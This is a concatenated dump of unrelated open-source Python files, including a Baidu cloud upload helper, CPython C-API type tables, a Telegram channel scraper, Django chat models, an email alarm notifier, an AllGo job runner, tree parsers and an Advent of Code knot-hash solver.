    finally:
        encrypt_io.close()
        if task_id is not None and progress_task_exists(task_id):
            _progress.reset(task_id)
def _check_md5(
    api: BaiduPCSApi,
    localpath: str,
    remotepath: str,
    slice_md5: str,
    content_md5: str,
    content_crc32: int,  # not needed
    content_length: int,
    encrypt_password: bytes = b"",
    encrypt_type: str = "",
    user_id: Optional[int] = None,
    user_name: Optional[str] = None,
):
    """Fix remote content md5 with rapid upload.

    There is a delay for server to handle uploaded data after
    `combine_slices`, so we retry fixing it.

    Fix applied: the ``encrypt_password=`` keyword value had been destroyed
    by a redaction pass; forwarding is restored.

    NOTE(review): this loop retries forever with a 2s pause; if the server
    never accepts the rapid-upload request the caller blocks indefinitely --
    confirm this is intended.
    """
    i = 0
    while True:
        logger.debug(
            f"`_check_md5`: retry: {i}: "
            "slice_md5: %s, content_md5: %s, content_crc32: %s, io_len: %s, remotepath: %s",
            slice_md5,
            content_md5,
            content_crc32,
            content_length,
            remotepath,
        )
        i += 1
        try:
            api.rapid_upload_file(
                slice_md5,
                content_md5,
                content_crc32,  # not needed
                content_length,
                remotepath,
                ondup="overwrite",
            )
            logger.warning("`_check_md5`: successes")
            if _rapiduploadinfo_file:
                save_rapid_upload_info(
                    _rapiduploadinfo_file,
                    slice_md5,
                    content_md5,
                    content_crc32,
                    content_length,
                    localpath=localpath,
                    remotepath=remotepath,
                    encrypt_password=encrypt_password,
                    encrypt_type=encrypt_type,
                    user_id=user_id,
                    user_name=user_name,
                )
            return
        except Exception as err:
            logger.warning("`_check_md5`: fails: %s", err)
            time.sleep(2)
            continue
| 2 | 2 |
cppy/c_types.py | defgsus/cppy | 0 | 12766397 | """
Collection of lists and dicts representing types in the python C-API
"""
"""
CPython's function pointers as dict:
typename: (return_type, (args,))
"""
FUNCTIONS = {
"unaryfunc": ("PyObject*", ("PyObject*",)),
"binaryfunc": ("PyObject*", ("PyObject*", "PyObject*")),
"ternaryfunc": ("PyObject*", ("PyObject*", "PyObject*", "PyObject*")),
"inquiry": ("int", ("PyObject*",)),
"lenfunc": ("Py_ssize_t", ("PyObject*",)),
"ssizeargfunc": ("PyObject*", ("PyObject*", "Py_ssize_t")),
"ssizessizeargfunc": ("PyObject*", ("PyObject*", "Py_ssize_t", "Py_ssize_t")),
"ssizeobjargproc": ("int", ("PyObject*", "Py_ssize_t", "PyObject*")),
"ssizessizeobjargproc": ("int", ("PyObject*", "Py_ssize_t", "Py_ssize_t", "PyObject*")),
"objobjargproc": ("int", ("PyObject*", "PyObject*", "PyObject*")),
"freefunc": ("void", ("void*",)),
"destructor": ("void", ("PyObject*",)),
"printfunc": ("int", ("PyObject*", "FILE*", "int")),
"getattrfunc": ("PyObject*", ("PyObject*", "char*")),
"getattrofunc": ("PyObject*", ("PyObject*", "PyObject*")),
"setattrfunc": ("int", ("PyObject*", "char*", "PyObject*")),
"setattrofunc": ("int", ("PyObject*", "PyObject*", "PyObject*")),
"reprfunc": ("PyObject*", ("PyObject*",)),
"hashfunc": ("Py_hash_t", ("PyObject*",)),
"richcmpfunc": ("PyObject*", ("PyObject*", "PyObject*", "int")),
"getiterfunc": ("PyObject*", ("PyObject*",)),
"iternextfunc": ("PyObject*", ("PyObject*",)),
"descrgetfunc": ("PyObject*", ("PyObject*", "PyObject*", "PyObject*")),
"descrsetfunc": ("int", ("PyObject*", "PyObject*", "PyObject*")),
"initproc": ("int", ("PyObject*", "PyObject*", "PyObject*")),
"newfunc": ("PyObject*", ("struct _typeobject*", "PyObject*", "PyObject*")),
"allocfunc": ("PyObject*", ("struct _typeobject*", "Py_ssize_t")),
"getter": ("PyObject*", ("PyObject*", "void*")),
"setter": ("int", ("PyObject*", "PyObject*", "void*")),
"objobjproc": ("int", ("PyObject*", "PyObject*")),
"visitproc": ("int", ("PyObject*", "void*")),
"traverseproc": ("int", ("PyObject*", "visitproc", "void*")),
}
"""
All members of PyTypeObject (member_name, type)
"""
PyTypeObject = [
("tp_name", "const char*"),
("tp_basicsize", "Py_ssize_t"),
("tp_itemsize", "Py_ssize_t"),
("tp_dealloc", "destructor"),
("tp_print", "printfunc"),
("tp_getattr", "getattrfunc"),
("tp_setattr", "setattrfunc"),
("tp_reserved", "void*"),
("tp_repr", "reprfunc"),
("tp_as_number", "PyNumberMethods*"),
("tp_as_sequence", "PySequenceMethods*"),
("tp_as_mapping", "PyMappingMethods*"),
("tp_hash", "hashfunc"),
("tp_call", "ternaryfunc"),
("tp_str", "reprfunc"),
("tp_getattro", "getattrofunc"),
("tp_setattro", "setattrofunc"),
("tp_as_buffer", "PyBufferProcs*"),
("tp_flags", "unsigned long"),
("tp_doc", "const char*"),
("tp_traverse", "traverseproc"),
("tp_clear", "inquiry"),
("tp_richcompare", "richcmpfunc"),
("tp_weaklistoffset", "Py_ssize_t"),
("tp_iter", "getiterfunc"),
("tp_iternext", "iternextfunc"),
("tp_methods", "struct PyMethodDef*"),
("tp_members", "struct PyMemberDef*"),
("tp_getset", "struct PyGetSetDef*"),
("tp_base", "struct _typeobject*"),
("tp_dict", "PyObject*"),
("tp_descr_get", "descrgetfunc"),
("tp_descr_set", "descrsetfunc"),
("tp_dictoffset", "Py_ssize_t"),
("tp_init", "initproc"),
("tp_alloc", "allocfunc"),
("tp_new", "newfunc"),
("tp_free", "freefunc"),
("tp_is_gc", "inquiry"),
("tp_bases", "PyObject*"),
("tp_mro", "PyObject*"),
("tp_cache", "PyObject*"),
("tp_subclasses", "PyObject*"),
("tp_weaklist", "PyObject*"),
("tp_del", "destructor"),
("tp_version_tag", "unsigned int"),
("tp_finalize", "destructor"),
]
# Members of CPython's ``PyNumberMethods`` struct, in declaration order.
PyNumberMethods = [
    ("nb_add", "binaryfunc"),
    ("nb_subtract", "binaryfunc"),
    ("nb_multiply", "binaryfunc"),
    ("nb_remainder", "binaryfunc"),
    ("nb_divmod", "binaryfunc"),
    ("nb_power", "ternaryfunc"),
    ("nb_negative", "unaryfunc"),
    ("nb_positive", "unaryfunc"),
    ("nb_absolute", "unaryfunc"),
    ("nb_bool", "inquiry"),
    ("nb_invert", "unaryfunc"),
    ("nb_lshift", "binaryfunc"),
    ("nb_rshift", "binaryfunc"),
    ("nb_and", "binaryfunc"),
    ("nb_xor", "binaryfunc"),
    ("nb_or", "binaryfunc"),
    ("nb_int", "unaryfunc"),
    ("nb_reserved", "void*"),
    ("nb_float", "unaryfunc"),
    ("nb_inplace_add", "binaryfunc"),
    ("nb_inplace_subtract", "binaryfunc"),
    ("nb_inplace_multiply", "binaryfunc"),
    ("nb_inplace_remainder", "binaryfunc"),
    ("nb_inplace_power", "ternaryfunc"),
    ("nb_inplace_lshift", "binaryfunc"),
    ("nb_inplace_rshift", "binaryfunc"),
    ("nb_inplace_and", "binaryfunc"),
    ("nb_inplace_xor", "binaryfunc"),
    ("nb_inplace_or", "binaryfunc"),
    ("nb_floor_divide", "binaryfunc"),
    ("nb_true_divide", "binaryfunc"),
    ("nb_inplace_floor_divide", "binaryfunc"),
    ("nb_inplace_true_divide", "binaryfunc"),
    ("nb_index", "unaryfunc"),
]
# Members of the remaining CPython protocol structs, in declaration order.
PySequenceMethods = [
    ("sq_length", "lenfunc"),
    ("sq_concat", "binaryfunc"),
    ("sq_repeat", "ssizeargfunc"),
    ("sq_item", "ssizeargfunc"),
    ("was_sq_slice", "void*"),
    ("sq_ass_item", "ssizeobjargproc"),
    ("was_sq_ass_slice", "void*"),
    ("sq_contains", "objobjproc"),
    ("sq_inplace_concat", "binaryfunc"),
    ("sq_inplace_repeat", "ssizeargfunc"),
]

PyMappingMethods = [
    ("mp_length", "lenfunc"),
    ("mp_subscript", "binaryfunc"),
    ("mp_ass_subscript", "objobjargproc"),
]

PyBufferProcs = [
    ("bf_getbuffer", "getbufferproc"),
    ("bf_releasebuffer", "releasebufferproc"),
]

PyModuleDef = [
    ("m_name", "const char*"),
    ("m_doc", "const char*"),
    ("m_size", "Py_ssize_t"),
    ("m_methods", "PyMethodDef*"),
    ("m_reload", "inquiry"),
    ("m_traverse", "traverseproc"),
    ("m_clear", "inquiry"),
    ("m_free", "freefunc"),
]
# Python special-method name -> PySequenceMethods member.  "__???__" marks
# slots with no (known) direct dunder equivalent.
SEQUENCE_FUNCS = [
    ("__len__", "sq_length"),
    ("__???__", "sq_concat"),
    ("__???__", "sq_repeat"),
    ("__getitem__", "sq_item"),
    ("__???___", "was_sq_slice"),
    ("__setitem__", "sq_ass_item"),
    ("__???___", "was_sq_ass_slice"),
    ("__contains__", "sq_contains"),
    ("__???___", "sq_inplace_concat"),
    ("__???___", "sq_inplace_repeat"),
]

# Python special-method name -> PyNumberMethods member and its typedef.
NUMBER_FUNCS = [
    ("__add__", "nb_add", "binaryfunc"),
    ("__sub__", "nb_subtract", "binaryfunc"),
    ("__mul__", "nb_multiply", "binaryfunc"),
    ("__mod__", "nb_remainder", "binaryfunc"),
    ("__???__", "nb_divmod", "binaryfunc"),
    ("__pow__", "nb_power", "ternaryfunc"),
    ("__neg__", "nb_negative", "unaryfunc"),
    ("__pos__", "nb_positive", "unaryfunc"),
    ("__abs__", "nb_absolute", "unaryfunc"),
    ("__bool__", "nb_bool", "inquiry"),
    ("__???__", "nb_invert", "unaryfunc"),
    ("__???__", "nb_lshift", "binaryfunc"),
    ("__???__", "nb_rshift", "binaryfunc"),
    ("__and__", "nb_and", "binaryfunc"),
    ("__xor__", "nb_xor", "binaryfunc"),
    ("__or__", "nb_or", "binaryfunc"),
    ("__???__", "nb_int", "unaryfunc"),
    ("__???__", "nb_reserved", "void*"),
    ("__???__", "nb_float", "unaryfunc"),
    ("__iadd__", "nb_inplace_add", "binaryfunc"),
    ("__isub__", "nb_inplace_subtract", "binaryfunc"),
    ("__imul__", "nb_inplace_multiply", "binaryfunc"),
    ("__imod__", "nb_inplace_remainder", "binaryfunc"),
    ("__ipow__", "nb_inplace_power", "ternaryfunc"),
    ("__???__", "nb_inplace_lshift", "binaryfunc"),
    ("__???__", "nb_inplace_rshift", "binaryfunc"),
    ("__iand__", "nb_inplace_and", "binaryfunc"),
    ("__ixor__", "nb_inplace_xor", "binaryfunc"),
    ("__ior__", "nb_inplace_or", "binaryfunc"),
    ("__floordiv__", "nb_floor_divide", "binaryfunc"),
    ("__truediv__", "nb_true_divide", "binaryfunc"),
    ("__ifloordiv__", "nb_inplace_floor_divide", "binaryfunc"),
    ("__itruediv__", "nb_inplace_true_divide", "binaryfunc"),
    ("__???__", "nb_index", "unaryfunc"),
]
# Python special-method name -> PyTypeObject member.
TYPE_FUNCS = [
    ("__str__", "tp_str"),
    ("__unicode__", "tp_str"),
    ("__repr__", "tp_repr"),
    ("__init__", "tp_init"),
    ("__eq__", "tp_richcompare"),
]

# Return types for dunders whose slot does not return PyObject*.
# otherwise PyObject*
SPECIAL_RETURN_TYPES = {
    "__init__": "int",
    "__len__": "Py_ssize_t",
    "__setitem__": "int",
}

# Extra C argument lists for index-based item access dunders.
SPECIAL_ARGUMENTS = {
    "__getitem__": ", Py_ssize_t index",
    "__setitem__": ", Py_ssize_t index, PyObject* arg",
}
# Derived lookup tables.  ``setdefault`` is used deliberately so that the
# FIRST occurrence of a duplicate key wins (placeholder names such as
# "__???__" appear several times in the source lists).
FUNCNAME_TO_STRUCT_MEMBER = dict()
for entry in SEQUENCE_FUNCS + NUMBER_FUNCS + TYPE_FUNCS:
    # Entries are 2- or 3-tuples; only (dunder_name, struct_member) matter.
    FUNCNAME_TO_STRUCT_MEMBER.setdefault(entry[0], entry[1])

# struct member name -> C typedef of that member.
STRUCT_MEMBER_TO_TYPE = dict()
for member_name, type_name in (
    PyModuleDef + PyBufferProcs + PyMappingMethods
    + PySequenceMethods + PyNumberMethods + PyTypeObject
):
    STRUCT_MEMBER_TO_TYPE.setdefault(member_name, type_name)

# dunder name -> C typedef, where the struct member's type is known.
FUNCNAME_TO_TYPE = dict()
for func_name, member_name in FUNCNAME_TO_STRUCT_MEMBER.items():
    if member_name in STRUCT_MEMBER_TO_TYPE:
        FUNCNAME_TO_TYPE.setdefault(func_name, STRUCT_MEMBER_TO_TYPE[member_name])
AlphabetPy/__init__.py | RayZhao1998/alphabetPy | 6 | 12766398 | from .alphabet import start, getAlphabet
if __name__ == '__main__':
    # Manual smoke test when the module is executed directly.
    # (Removed the dataset-dump artifact that was fused onto the last line
    # and made it a syntax error.)
    start()
    getAlphabet()
posts/news_grabber.py | Shubarin/alice_news_skill | 0 | 12766399 | # coding=utf-8
import configparser
import datetime as dt
import json
import sqlite3
import os
from telethon.sync import TelegramClient
from telethon import connection
# для корректного переноса времени сообщений в json
from datetime import date, datetime
# классы для работы с каналами
from telethon.tl.functions.channels import GetParticipantsRequest
from telethon.tl.types import ChannelParticipantsSearch
# класс для работы с сообщениями
from telethon.tl.functions.messages import GetHistoryRequest
# Read the Telegram API credentials from the local config file.
config = configparser.ConfigParser()
config.read("config.ini")
# Bind the credential values to module-level names.
api_id = config['Telegram']['api_id']
api_hash = config['Telegram']['api_hash']
username = config['Telegram']['username']
# NOTE(review): the client is created and started at import time (network
# side effect on import) -- confirm this is intended.
client = TelegramClient(username, api_id, api_hash)
client.start()
async def dump_all_messages(channel):
    """Fetch the message history of a channel/chat and store it in SQLite.

    Reads history in pages of ``limit_msg`` messages (up to
    ``total_count_limit`` total) and inserts each non-empty message into the
    ``news`` table of ``db.sqlite``.  Insertion stops at the first duplicate
    primary key, i.e. when already-saved messages are reached.
    """
    offset_msg = 0          # message id to start reading from
    limit_msg = 100         # maximum number of records fetched per request
    all_messages = []       # accumulated message dicts
    total_messages = 0
    total_count_limit = 100  # stop after this many messages

    class DateTimeEncoder(json.JSONEncoder):
        """JSON encoder that can serialize datetimes and raw bytes."""
        def default(self, o):
            if isinstance(o, datetime):
                return o.isoformat()
            if isinstance(o, bytes):
                return list(o)
            return json.JSONEncoder.default(self, o)

    while True:
        history = await client(GetHistoryRequest(
            peer=channel,
            offset_id=offset_msg,
            offset_date=None, add_offset=0,
            limit=limit_msg, max_id=0, min_id=0,
            hash=0))
        if not history.messages:
            break
        messages = history.messages
        for message in messages:
            all_messages.append(message.to_dict())
        offset_msg = messages[len(messages) - 1].id
        total_messages = len(all_messages)
        if total_count_limit != 0 and total_messages >= total_count_limit:
            break

    db_name = 'db.sqlite'
    con = sqlite3.connect(db_name)
    cur = con.cursor()
    for line in all_messages:
        try:
            # Renamed from `id`, which shadowed the builtin.
            msg_id = line['id']
            message = line['message']
            if not message:
                continue
            # NOTE(review): %I is the 12-hour clock without AM/PM marker --
            # possibly %H (24-hour) was intended; confirm.
            pub_date = line['date'].strftime("%Y-%m-%d %I:%M:%S")
            # Fix: parameterized query.  The previous f-string INSERT both
            # allowed SQL injection and crashed on any message containing
            # a single quote.
            cur.execute(
                "INSERT INTO news(id,message,pub_date) VALUES(?, ?, ?)",
                (msg_id, message, pub_date),
            )
        except sqlite3.IntegrityError:
            # Duplicate primary key: we have reached already-saved messages.
            break
        except Exception:
            # Best-effort import: skip malformed records (was a bare except,
            # which also swallowed KeyboardInterrupt/SystemExit).
            continue
    con.commit()
    con.close()
async def main():
    # Resolve the target channel entity by its public URL and dump its
    # recent history into the local database.
    url = "https://t.me/QryaProDucktion"
    channel = await client.get_entity(url)
    await dump_all_messages(channel)
with client:
client.loop.run_until_complete(main()) | 2.421875 | 2 |
pandemic/chat/models.py | RubenBranco/Pandemic | 1 | 12766400 | <gh_stars>1-10
from django.db import models
from django.contrib.auth.models import User
from game.models import Session
import uuid
class Chat(models.Model):
    """Chat room attached to a single game session."""
    # Deleting the session cascades to its chat.
    session = models.ForeignKey(Session, on_delete=models.CASCADE)
    def __str__(self):
        # Human-readable identifier used in the admin and in logs.
        return f"session={self.session!s}"
class Message(models.Model):
    """A single chat message posted by a user."""
    # Deleting the chat or the sending user cascades to their messages.
    chat = models.ForeignKey(Chat, on_delete=models.CASCADE)
    sender = models.ForeignKey(User, related_name="user_message", on_delete=models.CASCADE)
    # Message body; hard limit of 512 characters.
    text = models.CharField(max_length=512)
    # Set automatically when the row is first created.
    date_time = models.DateTimeField(auto_now_add=True)
    def __str__(self):
        return f"[{self.date_time}] {self.sender.username}: {self.text}"
| 2.34375 | 2 |
election/__init__.py | ideascf/octopus | 6 | 12766401 | # coding=utf-8
from .election import Election
| 1.078125 | 1 |
src/quocspyside2interface/logic/HandleExitBasic.py | Quantum-OCS/QuOCS-pyside2interface | 1 | 12766402 | # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Copyright 2021- QuOCS Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
import logging
from qtpy import QtCore
class HandleExitBasic(QtCore.QObject):
    """This class check and update the current optimization status and notify the Client Interface and the Optimization
    code about it"""
    logger = logging.getLogger("oc_logger")
    # NOTE(review): annotated but never initialised -- calling
    # check_communication() before set_is_user_running() raises
    # AttributeError; confirm this is the intended contract.
    is_user_running: bool

    @QtCore.Slot(bool)
    def set_is_user_running(self, is_running: bool):
        """
        Module connected with the Client Interface GUI. Stop the communication when the user presses to the Stop button
        :param bool is_running:
        :return:
        """
        self.is_user_running = is_running

    def check_communication(self, communication: dict) -> bool:
        """
        Update the Client Interface and Optimization Code numbers and return the running status
        :param dict communication:
        :return: bool : True if it is still running, False stopped by the interface or the optimization code
        """
        if not self.is_user_running:
            return False
        # Check the communication dictionary: -1 and 4 are the server codes
        # that signal the end of the exchange.
        server_number = communication["server_number"]
        if server_number == -1 or server_number == 4:
            self.logger.info("End of communications")
            return False
        else:
            return True

    def get_terminate_reason(self) -> str:
        """
        Get the ending reason
        :return: str : terminate reason
        """
        # TODO: placeholder implementation -- no real reason is tracked yet.
        print("Something to write here")
        return "No idea"
| 2.015625 | 2 |
models/tree_utils.py | kchro/plato | 2 | 12766403 | import re
import spacy
import torch
class Tree:
    """Simple n-ary tree parsed from / serialized to ``head(a,b(c),...)`` formulas."""

    def __init__(self, val=None, formula=None):
        # Always initialize both attributes so a bare Tree() is a valid
        # (empty) node; previously neither was set when no args were given.
        self.val = val
        self.children = []
        if formula:
            root = self.parse(formula)
            self.val = root.val
            self.children = root.children

    def parse(self, formula):
        """Parse ``head(args)`` into a Tree; a bare token becomes a leaf."""
        m = re.search('(.*?)\\((.*)\\)', formula)
        if m:
            # NOTE: this was a huge fuckup
            # if m.group(1) not in '&|$~':
            #     return Tree(val=m.group(0))
            root = Tree(val=m.group(1))
            subformula = m.group(2)
            if not subformula:
                # "f()" has no arguments -> no children.  Previously this
                # crashed with an unbound-local error on `end`.
                return root
            # Split the argument list on top-level commas only.
            splits = []
            paren_count = 0
            start = 0
            for end in range(len(subformula)):
                if subformula[end] == '(':
                    paren_count += 1
                elif subformula[end] == ')':
                    paren_count -= 1
                elif paren_count == 0:
                    if subformula[end] == ',':
                        splits.append(subformula[start:end])
                        start = end + 1
            splits.append(subformula[start:])
            root.children = [self.parse(sub) for sub in splits]
            return root
        return Tree(val=formula)

    def flatten(self):
        """Flatten the tree back into its ``head(a,b,...)`` string form."""
        if len(self.children) == 0:
            return self.val
        params = (',').join([child.flatten() for child in self.children])
        return '%s(%s)' % (self.val, params)

    def inorder(self):
        """Generate the node sequence pre-order, with ``<N>`` placeholders
        standing in for each child position (non-terminals included)."""
        if len(self.children) == 0:
            return ['%s' % self.val]
        params = (' , ').join([' <N> '] * len(self.children))
        inorder = ['%s ( %s ) ' % (self.val, params)]
        for child in self.children:
            inorder += child.inorder()
        return inorder

    def __str__(self):
        """Render the tree hierarchically, one node per line, tab-indented."""
        if len(self.children) == 0:
            return self.val
        ret = [self.val]
        for child in self.children:
            ret += ['\t' + child_s for child_s in str(child).split('\n')]
        return ('\n').join(ret)
nlp = spacy.load('en')
class DepTree:
    """Dependency-parse tree over a sentence.

    Each node stores the lower-cased token text (or ``<UNK>`` when out of
    vocabulary), its vocabulary index, and that index as a long tensor on
    ``device``.  Built either from a raw sentence (parsed with the
    module-level spaCy pipeline) or from an existing spaCy token.
    """

    def __init__(self, sent=None, node=None, src_vocab=None, device='cpu'):
        self.device = device
        self.src_vocab = src_vocab
        if sent:
            # Fix: `unicode` does not exist in Python 3 (NameError); the
            # rest of the file (torch, f-strings elsewhere) targets Py3.
            doc = nlp(str(sent))
            node = self.get_root(doc)
        if node:
            self.val = node.text.lower()
            if self.val not in self.src_vocab.vocab:
                self.val = '<UNK>'
            self.idx = src_vocab.word_to_index[self.val]
            self.input = torch.tensor(self.idx,
                                      dtype=torch.long,
                                      device=self.device)
            self.children = [
                DepTree(node=child, src_vocab=src_vocab, device=self.device)
                for child in node.children
            ]

    def get_root(self, doc):
        """Return the token whose dependency label is ROOT.

        Raises ValueError if the document has no ROOT token.  (Previously a
        bare ``raise`` with no active exception, which surfaced as a
        confusing RuntimeError.)
        """
        for token in doc:
            if token.dep_ == 'ROOT':
                return token
        raise ValueError('no ROOT token in document')
| 2.796875 | 3 |
alarm_central_station_receiver/notifications/notifiers/emailer.py | alexp789/alarm-central-station-receiver | 25 | 12766404 | """
Copyright (2017) <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from alarm_central_station_receiver.config import AlarmConfig
def create_message(events):
    """Render alarm events as a plain-text message body.

    The timestamp of the first event (strictly: the first truthy timestamp
    encountered) is prepended because SMS/email delivery can lag well
    behind the time the event actually occurred.
    """
    lines = []
    timestamp = ''
    for event in events:
        if not timestamp:
            timestamp = event.get('timestamp')
        lines.append(f"{event.get('type')}: {event.get('description')}")
    return f"{timestamp}:\n" + "\n".join(lines)
def notify(events):
    """Send the given alarm events as a single email notification.

    Silently returns when there are no events or when the
    ``EmailNotification`` section is absent from the configuration.
    SMTP failures are logged, not raised.
    """
    if not events:
        return
    if 'EmailNotification' not in AlarmConfig.config:
        return
    logging.info("Sending email...")
    username = AlarmConfig.config.get('EmailNotification', 'username')
    password = AlarmConfig.config.get('EmailNotification', 'password')
    to_addr = AlarmConfig.config.get('EmailNotification', 'notification_email')
    subject = AlarmConfig.config.get('EmailNotification', 'notification_subject')
    tls = AlarmConfig.config.getboolean('EmailNotification', 'tls')
    server = AlarmConfig.config.get('EmailNotification', 'server_address')
    server_port = AlarmConfig.config.get('EmailNotification', 'port')
    msg = MIMEMultipart('alternative')
    msg['From'] = username
    msg['To'] = to_addr
    msg['Subject'] = subject
    body = create_message(events)
    # NOTE(review): the same plain-text body is attached under both the
    # text/plain and text/html subtypes -- presumably for picky SMS/email
    # gateways; confirm intended.
    msg.attach(MIMEText(body, 'plain'))
    msg.attach(MIMEText(body, 'html'))
    try:
        s = smtplib.SMTP(server, server_port)
        s.ehlo()
        if tls:
            # Upgrade the connection to TLS before authenticating.
            s.starttls()
            s.ehlo()
        s.login(username, password)
        s.sendmail(username, [to_addr], msg.as_string())
        s.quit()
        logging.info("Email send complete")
    except smtplib.SMTPException as exc:
        logging.error("Error sending email: %s", str(exc))
| 2.0625 | 2 |
day10/day10program2.py | ninjaoxygen/AdventOfCode2017Python | 0 | 12766405 | <filename>day10/day10program2.py
#!/usr/bin/python
import csv
import operator
# Shared mutable state for the knot-hash rounds (Advent of Code 2017, day 10).
elements = []  # the circular list being twisted
current = 0    # current position within the circular list
skip = 0       # skip size, incremented after every twist
def processLine(line, length):
    """Apply one round of knot-hash twists to the global `elements` list.

    `line` is the sequence of twist lengths; `length` is the size of the
    circular list.  `current` and `skip` persist across calls (rounds).
    """
    global elements
    global current
    global skip
    #print("first", elements)
    # process each entry in the swap list
    for i in range(0, len(line)):
        swapCount = line[i]
        # Reverse the `swapCount`-long span starting at `current` by
        # swapping symmetric pairs (indices wrap around the list).
        for j in range(0, int(swapCount / 2)):
            i1 = (current + j) % length
            i2 = (current + swapCount - j - 1) % length
            #print("swapping ", i1, elements[i1], "with", i2, elements[i2])
            temp = elements[i1]
            elements[i1] = elements[i2]
            elements[i2] = temp
        #print("after swap", elements)
        current = (current + swapCount + skip) % length
        skip += 1
        #print("current is now", current)
    # get the check by multiplying first two numbers (part-1 checksum)
    print("checksum", elements[0] * elements[1])
def readFile(filename):
    """Return the first line of *filename* (trailing newline included, if any)."""
    with open(filename) as handle:
        return handle.readline()
def checkFile(filename, length):
    """Compute and print the full knot hash of the input in *filename*.

    Runs 64 rounds of `processLine` over the ASCII codes of the input line
    (plus the standard suffix 17,31,73,47,23), then condenses the sparse
    hash into 16 XOR-folded blocks and prints them as hex.
    """
    # Seed the global circular list with 0..length-1.
    for i in range(0, length):
        elements.append(i)
    # grab the list from the file
    line = readFile(filename)
    # Strip the trailing newline.
    line = line[0:len(line) - 1]
    data = []
    #print(line)
    # convert to integers (ASCII codes of each input character)
    for i in range(0, len(line)):
        data.append(ord(line[i]))
    # Standard day-10 part-2 length suffix.
    data.append(17)
    data.append(31)
    data.append(73)
    data.append(47)
    data.append(23)
    #print(data)
    # 64 iterations of the mixer; `current`/`skip` persist via globals.
    for i in range(0, 64):
        processLine(data, length)
    # calculate dense hash
    dense = []
    # NOTE: this `current` is a new LOCAL variable (no `global` here); it
    # does not touch the module-level cursor used by processLine.
    current = 0
    for j in range(0, 16):
        # compress one block of 16 values with XOR
        xorSum = 0
        for i in range(0, 16):
            xorSum ^= elements[current]
            current += 1
        dense.append(xorSum)
    strHex = ""
    for j in range(0, 16):
        strHex += "%0.2x" % dense[j]
    print(strHex)
checkFile("input.txt", 256)
| 3.765625 | 4 |
bioimageit_core/runners/service_allgo.py | bioimageit/bioimageit_core | 2 | 12766406 | # -*- coding: utf-8 -*-
"""bioimageit_core Allgo process service.
This module implements a service to run a process
using the AllGo client API (allgo18.inria.fr).
Classes
-------
ProcessServiceProvider
"""
import os
import ntpath
import allgo as ag
from bioimageit_core.config import ConfigAccess
from bioimageit_core.core.utils import Observable
from bioimageit_core.processes.containers import ProcessContainer
class AllgoRunnerServiceBuilder:
    """Service builder for the runner service (lazy singleton factory)."""
    def __init__(self):
        # The single shared service instance, created on first call.
        self._instance = None
    def __call__(self, **_ignored):
        # Extra keyword arguments are accepted (and ignored) so this builder
        # can be invoked uniformly alongside other service builders.
        if not self._instance:
            self._instance = AllgoRunnerService()
        return self._instance
class AllgoRunnerService(Observable):
    """Service for runner exec using AllGo client API"""

    def __init__(self):
        super().__init__()
        self.service_name = 'AllgoRunnerService'

    def set_up(self, process: ProcessContainer):
        """setup the runner

        Add here the code to initialize the runner

        Parameters
        ----------
        process
            Metadata of the process
        """
        pass

    def exec(self, process: ProcessContainer, args):
        """Execute a process remotely through the AllGo API.

        Uploads the data inputs, runs the job, then downloads each data
        output next to its expected local path.

        Parameters
        ----------
        process
            Metadata of the process
        args
            list of arguments

        Raises
        ------
        allgo.StatusError
            If the job submission fails.  (Previously the error was only
            printed and execution continued, crashing with a NameError on
            `out_dict` a few lines later.)
        """
        token = None
        config = ConfigAccess.instance().config['runner']
        if 'token' in config:
            token = config['token']
        client = ag.Client(token)

        # Build the parameter string: the remote job only sees bare file
        # names, so strip local directory components from every data path.
        params = ' '.join(args[1:])
        files = []
        for input_ in process.inputs:
            if input_.is_data:
                filename = ntpath.basename(input_.value)
                params = params.replace(input_.value, filename)
                files.append(input_.value)
        for output in process.outputs:
            if output.is_data:
                filename = ntpath.basename(output.value)
                params = params.replace(output.value, filename)

        try:
            out_dict = client.run_job(process.id, files=files, params=params)
        except ag.StatusError as e:
            print('API status Error:', e.status_code)
            print('API status Error:', e.msg)
            # Fix: re-raise instead of falling through to an unbound
            # `out_dict` below.
            raise

        # Download the produced outputs.
        job_id = out_dict['id']
        for output in process.outputs:
            output_filename = ntpath.basename(output.value)
            output_dir = os.path.dirname(os.path.abspath(output.value))
            url = out_dict[str(job_id)][output_filename]
            client.download_file(file_url=url, outdir=output_dir, force=True)

    def tear_down(self, process: ProcessContainer):
        """tear down the runner

        Add here the code to down/clean the runner

        Parameters
        ----------
        process
            Metadata of the process
        """
        pass
| 2.328125 | 2 |
apps/social/urls.py | louis-pre/NewsBlur | 0 | 12766407 | <gh_stars>0
from django.conf.urls import url
from apps.social import views
# URL routes for the social app.  Order matters: the catch-all
# `shared-stories-public` username pattern must stay LAST or it would
# shadow every other route.
urlpatterns = [
    url(r'^river_stories/?$', views.load_river_blurblog, name='social-river-blurblog'),
    url(r'^share_story/?$', views.mark_story_as_shared, name='mark-story-as-shared'),
    url(r'^unshare_story/?$', views.mark_story_as_unshared, name='mark-story-as-unshared'),
    url(r'^load_user_friends/?$', views.load_user_friends, name='load-user-friends'),
    url(r'^load_follow_requests/?$', views.load_follow_requests, name='load-follow-requests'),
    url(r'^profile/?$', views.profile, name='profile'),
    url(r'^load_user_profile/?$', views.load_user_profile, name='load-user-profile'),
    url(r'^save_user_profile/?$', views.save_user_profile, name='save-user-profile'),
    url(r'^upload_avatar/?', views.upload_avatar, name='upload-avatar'),
    url(r'^save_blurblog_settings/?$', views.save_blurblog_settings, name='save-blurblog-settings'),
    url(r'^interactions/?$', views.load_interactions, name='social-interactions'),
    url(r'^activities/?$', views.load_activities, name='social-activities'),
    # Follower management.
